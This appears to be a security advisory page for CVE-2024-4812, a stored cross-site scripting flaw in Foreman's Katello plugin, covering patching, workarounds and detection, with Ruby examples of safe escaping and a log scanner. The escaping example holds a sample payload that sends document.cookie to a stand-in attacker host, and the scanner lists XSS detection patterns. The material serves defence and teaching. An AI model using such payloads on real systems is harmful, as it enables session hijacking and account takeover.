CVE-2024-4812

4.8 MEDIUM

📋 TL;DR

This vulnerability is a stored cross-site scripting (XSS) flaw in the Katello plugin for Foreman. An authenticated user who can edit a user's description field can store JavaScript in it; the script then runs in the browser of anyone who views a page that renders that description, such as Host Collections. Organizations running a vulnerable Katello version on Foreman are affected.

💻 Affected Systems

Products:
  • Foreman with Katello plugin
Versions: Katello plugin versions before 4.15.1
Operating Systems: Linux distributions running Foreman (RHEL, CentOS, etc.)
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects installations where the Katello plugin is enabled; exploitation requires an account that is permitted to edit user description fields.

📦 What is this software?

Foreman is an open-source lifecycle management tool for physical and virtual hosts (provisioning, configuration management integration, reporting). Katello is a Foreman plugin that adds content management: software repositories, subscriptions, errata and content views. Red Hat Satellite 6 is built from Foreman and Katello; check the vendor advisory under Fix & Mitigation for Satellite's affected status.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to account compromise or further system access.

🟠

Likely Case

Attackers with user account access could perform targeted attacks against administrators or other users viewing affected pages, potentially stealing credentials or session data.

🟢

If Mitigated

With output encoding applied where the description is rendered (and input validation as a second layer), the stored payload is displayed as literal text rather than parsed by the browser as markup, so nothing executes.
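The difference between the two outcomes, as an added Ruby example written for this page (not Katello's or Foreman's own view code): the unsafe renderer interpolates a stored description straight into HTML, the safe one HTML-encodes it with ERB::Util.html_escape, the routine Rails' view auto-escaping uses. The row layout, function names and sample descriptions are assumptions made for the example.

```ruby
require "erb"

# Constructed sample descriptions for this example (not taken from any real
# Foreman instance). The payload is the generic shape of a stored XSS probe.
SAMPLE_DESCRIPTIONS = {
  benign:  "Ops team lead, on-call rotation B",
  payload: %q{<img src=x onerror="fetch('https://attacker.example/c?'+document.cookie)">}
}.freeze

# Vulnerable pattern: the stored field is concatenated into the HTML response
# unchanged, so the browser parses the tag and runs the onerror handler.
# (Illustrates the bug class; this is not Katello's own view code.)
def render_user_row_unsafe(login, description)
  "<tr><td>#{login}</td><td>#{description}</td></tr>"
end

# Hardened pattern: HTML-encode every untrusted value at the point of output.
# ERB::Util.html_escape is the same routine Rails uses for auto-escaping; the
# equivalent bug in a Rails view is usually a stray `raw` or `.html_safe`.
def render_user_row_safe(login, description)
  "<tr><td>#{ERB::Util.html_escape(login)}</td>" \
    "<td>#{ERB::Util.html_escape(description)}</td></tr>"
end

# Observable check without a browser: after removing the static <tr>/<td>
# scaffolding we emitted ourselves, does any '<' survive from the input?
# In the safe output every '<' from the input has become "&lt;".
def injected_markup?(html)
  html.gsub(%r{</?t[rd]>}, "").include?("<")
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_DESCRIPTIONS.each do |label, desc|
    puts "#{label}/unsafe: #{render_user_row_unsafe('eve', desc)}"
    puts "#{label}/safe:   #{render_user_row_safe('eve', desc)}"
  end
end
```

The benign description renders identically through both paths; only the payload differs, which is the property to test for when confirming a fix: the escaped row contains `&lt;img` and no raw tag.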

🌐 Internet-Facing: MEDIUM - If Foreman is internet-accessible, attackers could exploit this to target administrators or users accessing the interface.
🏢 Internal Only: MEDIUM - Internal attackers or compromised accounts could use this to escalate privileges or target other users within the organization.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Requires authenticated access to modify user descriptions. Exploitation is straightforward once access is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Katello plugin 4.15.1

Vendor Advisory: https://access.redhat.com/security/cve/CVE-2024-4812

Restart Required: Yes

Instructions:

1. Update the Katello plugin to version 4.15.1 or later. On EL-based installations this is normally a package update followed by a re-run of foreman-installer, which also restarts the affected services.
2. Restart the Foreman services if the installer did not already do so.
3. Verify the fix by checking the installed plugin version (see How to Verify).

🔧 Temporary Workarounds

Input validation enhancement

Add server-side validation that rejects user descriptions containing markup (for example anything with a "<" character or an on*= attribute). This needs a custom Foreman plugin or initializer, and it only limits what can be stored: the unescaped rendering remains and payloads already stored are untouched, so treat it as defence in depth rather than a fix.

Content Security Policy

Serve a Content-Security-Policy header that restricts where scripts may load from, configured on the web server in front of Foreman. Caveat: Foreman's web UI relies on inline scripts, so a policy that omits 'unsafe-inline' for script-src is likely to break pages, while a policy that keeps it does not stop inline stored XSS. Roll any change out in Content-Security-Policy-Report-Only mode first and review the reports before enforcing.

🧯 If You Can't Patch

  • Limit the edit_users permission (and any role that can edit user records) to trusted administrators, so that only a small, accountable set of accounts can write to the description field
  • Add web application firewall rules that flag or block script-like content in writes to the user update endpoints (/users/:id and /api/v2/users/:id); pattern matching is bypassable, so treat this as a detection aid rather than a fix

🔍 How to Verify

Check if Vulnerable:

Find the installed Katello version: in the web UI, Administer > About lists each plugin with its version; on EL-based installations the package query below gives the same information (older SCL-based installs use the package name tfm-rubygem-katello).

Check Version:

rpm -q rubygem-katello

Verify Fix Applied:

Confirm the Katello version is 4.15.1 or later, then test that a description containing markup (for example <b>test</b> in a test account's description) is displayed literally on the Host Collections page rather than rendered.

📡 Detection & Monitoring

Log Indicators:

  • Foreman's production.log: PUT/PATCH/POST requests to /users/:id or /api/v2/users/:id whose logged Parameters contain a description with tag-like content ("<script", "<img", on*= handlers, "javascript:")
  • Monitor > Audits: changes to user records whose new description value contains markup, especially edits to accounts other than the actor's own

Network Indicators:

  • HTTP requests to the user update endpoints carrying script-like content in the body (visible only where the TLS termination point or WAF can inspect it)

SIEM Query:

source="foreman" AND ("description" OR "user_update") AND ("script" OR "javascript" OR "onclick")

This query is deliberately broad: "script" also matches benign descriptions and unrelated log lines, so scope it to the user update endpoints and tune it against your own baseline before alerting on it.
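A detection pass over request logs, as an added Ruby example rather than anything shipped with Foreman: it correlates the Started line of each PUT/PATCH/POST to /users/:id or /api/v2/users/:id with its Parameters line via the request id, extracts the description parameter and flags markup-shaped content. The sample log lines are constructed for this example (made-up IPs, IDs and timestamps) and only approximate the format of Foreman's production.log; adjust the prefix regex to your installation's log format.

```ruby
# Added example: scan Foreman's Rails-style production.log for user-update
# requests whose "description" parameter looks like an XSS payload.
# The lines below are constructed for this example (made-up timestamps, IPs,
# request IDs and user IDs); the "[level|app|request_id]" prefix and the
# Started/Parameters lines mirror the shape of Foreman's request logging.
SAMPLE_LOG = <<~'LOG'
  2024-05-10T10:15:02 [I|app|a1b2c3] Started PUT "/users/7" for 10.0.0.9 at 2024-05-10 10:15:02 +0000
  2024-05-10T10:15:02 [I|app|a1b2c3] Processing by UsersController#update as HTML
  2024-05-10T10:15:02 [I|app|a1b2c3]   Parameters: {"user"=>{"description"=>"<img src=x onerror=alert(document.cookie)>", "mail"=>"eve@example.com"}, "id"=>"7"}
  2024-05-10T10:15:03 [I|app|a1b2c3] Completed 302 Found in 41ms
  2024-05-10T10:16:11 [I|app|d4e5f6] Started PUT "/api/v2/users/3" for 10.0.0.22 at 2024-05-10 10:16:11 +0000
  2024-05-10T10:16:11 [I|app|d4e5f6] Processing by Api::V2::UsersController#update as JSON
  2024-05-10T10:16:11 [I|app|d4e5f6]   Parameters: {"user"=>{"description"=>"Capacity <= 80%: alerts go to storage@example.com"}, "id"=>"3"}
  2024-05-10T10:16:11 [I|app|d4e5f6] Completed 200 OK in 30ms
  2024-05-10T10:17:40 [I|app|0a0b0c] Started PUT "/api/v2/users/3" for 10.0.0.22 at 2024-05-10 10:17:40 +0000
  2024-05-10T10:17:40 [I|app|0a0b0c]   Parameters: {"user"=>{"description"=>"javascript:alert(1)"}, "id"=>"3"}
  2024-05-10T10:18:05 [I|app|7f7e7d] Started PUT "/hosts/12" for 10.0.0.5 at 2024-05-10 10:18:05 +0000
  2024-05-10T10:18:05 [I|app|7f7e7d]   Parameters: {"host"=>{"comment"=>"<b>rack 4</b>"}, "id"=>"12"}
LOG

# Only writes to user records (UI and API routes) are in scope for this CVE.
USER_WRITE_PATH = %r{\A/(?:api/v2/)?users/\d+\z}
REQUEST_START   = /\A\S+ \[\w\|app\|(?<rid>\w+)\] Started (?<verb>PUT|PATCH|POST) "(?<path>[^"]+)" for (?<ip>[\h.:]+)/
PARAMS_LINE     = /\[\w\|app\|(?<rid>\w+)\]\s+Parameters: (?<params>.*)\z/
DESCRIPTION_KV  = /"description"=>"(?<value>(?:[^"\\]|\\.)*)"/

# Patterns tuned to look like markup rather than any '<': a bare "<=" in prose
# stays quiet, while a tag start, an on*= handler or a javascript: URL alerts.
XSS_PATTERNS = {
  html_tag:      %r{<\s*/?\s*[a-z][\w-]*}i,
  event_handler: /\bon[a-z]+\s*=/i,
  js_url:        /javascript\s*:/i
}.freeze

# Returns one alert hash per user-write request whose description matches.
def scan_foreman_log(text)
  requests = {}
  alerts   = []
  text.each_line(chomp: true) do |line|
    if (m = REQUEST_START.match(line))
      requests[m[:rid]] = { ip: m[:ip], verb: m[:verb], path: m[:path] }
    elsif (m = PARAMS_LINE.match(line)) && (req = requests[m[:rid]]) && USER_WRITE_PATH.match?(req[:path])
      next unless (kv = DESCRIPTION_KV.match(m[:params]))
      value = kv[:value].gsub('\\"', '"') # undo Rails' inspect-style quoting
      name, = XSS_PATTERNS.find { |_, re| re.match?(value) }
      alerts << req.merge(request_id: m[:rid], pattern: name, value: value) if name
    end
  end
  alerts
end

if $PROGRAM_NAME == __FILE__
  scan_foreman_log(SAMPLE_LOG).each do |a|
    puts "#{a[:request_id]} #{a[:ip]} #{a[:verb]} #{a[:path]} -> #{a[:pattern]}: #{a[:value]}"
  end
end
```

Run against the constructed sample it raises two alerts (the UI edit storing an img/onerror payload and the API edit storing a javascript: URL) and stays quiet on the description with a bare "<=" and on the host comment, which is not a user write. Correlating by request id matters because the source IP and path live on the Started line while the payload is on the Parameters line.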

🔗 References

  • Red Hat CVE page: https://access.redhat.com/security/cve/CVE-2024-4812
  • Foreman security advisories: https://theforeman.org/security.html